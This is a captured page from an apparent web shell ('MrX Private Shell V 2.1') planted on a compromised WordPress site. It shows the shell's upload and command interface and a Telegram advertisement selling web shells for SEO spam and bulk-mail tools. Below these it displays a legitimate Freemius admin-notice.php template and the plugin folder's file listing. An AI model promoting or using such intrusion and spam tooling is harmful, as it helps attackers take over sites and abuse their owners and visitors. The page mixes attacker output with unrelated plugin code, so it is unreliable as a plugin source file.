__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
	/**
	 * @package     Freemius
	 * @copyright   Copyright (c) 2015, Freemius, Inc.
	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
	 * @since       1.0.3
	 */

	if ( ! defined( 'ABSPATH' ) ) {
		exit;
	}

	/**
	 * @var array $VARS
	 */

	$dismiss_text = fs_text_x_inline( 'Dismiss', 'as close a window', 'dismiss' );

	$slug = '';
	$type = '';

	if ( ! empty( $VARS['manager_id'] ) ) {
		/**
		 * @var array $VARS
		 */
		$slug = $VARS['manager_id'];

		$type = WP_FS__MODULE_TYPE_PLUGIN;

		if ( false !== strpos( $slug, ':' ) ) {
			$parts = explode( ':', $slug );

			$slug = $parts[0];

			$parts_count = count( $parts );

			if ( 1 < $parts_count && WP_FS__MODULE_TYPE_THEME == $parts[1] ) {
				$type = $parts[1];
			}
		}
	}

	$attributes = array();
	if ( ! empty( $VARS['id'] ) ) {
		$attributes['data-id'] = $VARS['id'];
	}
	if ( ! empty( $VARS['manager_id'] ) ) {
		$attributes['data-manager-id'] = $VARS['manager_id'];
	}
	if ( ! empty( $slug ) ) {
		$attributes['data-slug'] = $slug;
	}
	if ( ! empty( $type ) ) {
		$attributes['data-type'] = $type;
	}

	$classes = array( 'fs-notice' );
	switch ( $VARS['type'] ) {
		case 'error':
			$classes[] = 'error';
			$classes[] = 'form-invalid';
			break;
		case 'promotion':
			$classes[] = 'updated';
			$classes[] = 'promotion';
			break;
		case 'warn':
			$classes[] = 'notice';
			$classes[] = 'notice-warning';
			break;
		case 'update':
		case 'success':
		default:
			$classes[] = 'updated';
			$classes[] = 'success';
			break;
	}
	if ( ! empty( $VARS['sticky'] ) ) {
		$classes[] = 'fs-sticky';
	}
	if ( ! empty( $VARS['plugin'] ) ) {
		$classes[] = 'fs-has-title';
	}
	if ( ! empty( $slug ) ) {
		$classes[] = "fs-slug-{$slug}";
	}
	if ( ! empty( $type ) ) {
		$classes[] = "fs-type-{$type}";
	}
?>
<div class="<?php echo fs_html_get_classname( $classes ); ?>" <?php echo fs_html_get_attributes( $attributes ); ?>>
	<?php if ( ! empty( $VARS['plugin'] ) ) : ?>
		<label class="fs-plugin-title">
			<?php echo esc_html( $VARS['plugin'] ); ?>
		</label>
	<?php endif ?>

	<?php if ( ! empty( $VARS['sticky'] ) && ( ! isset( $VARS['dismissible'] ) || false !== $VARS['dismissible'] ) ) : ?>
		<div class="fs-close">
			<i class="dashicons dashicons-no" title="<?php echo esc_attr( $dismiss_text ) ?>"></i>
			<span><?php echo esc_html( $dismiss_text ); ?></span>
		</div>
	<?php endif ?>

	<div class="fs-notice-body">
		<?php if ( ! empty( $VARS['title'] ) ) : ?>
			<strong><?php echo fs_html_get_sanitized_html( $VARS['title'] ); ?></strong>
		<?php endif ?>

		<?php echo fs_html_get_sanitized_html( $VARS['message'] ); ?>
	</div>
</div>

Filemanager

Name Type Size Permission Actions
account Folder 0750
checkout Folder 0750
connect Folder 0750
debug Folder 0750
forms Folder 0750
js Folder 0750
partials Folder 0750
plugin-info Folder 0750
account.php File 64.63 KB 0640
add-ons.php File 23.13 KB 0640
add-trial-to-pricing.php File 794 B 0640
admin-notice.php File 2.6 KB 0640
ajax-loader.php File 252 B 0640
api-connectivity-message-js.php File 1.01 KB 0640
auto-installation.php File 7.22 KB 0640
checkout.php File 732 B 0640
clone-resolution-js.php File 3.73 KB 0640
connect.php File 45.22 KB 0640
contact.php File 3.58 KB 0640
debug.php File 43.03 KB 0640
email.php File 1.01 KB 0640
gdpr-optin-js.php File 2.44 KB 0640
index.php File 87 B 0640
plugin-icon.php File 532 B 0640
pricing.php File 4.04 KB 0640
secure-https-header.php File 1.02 KB 0640
sticky-admin-notice-js.php File 1.24 KB 0640
tabs-capture-js.php File 1.73 KB 0640
tabs.php File 6.81 KB 0640
Filemanager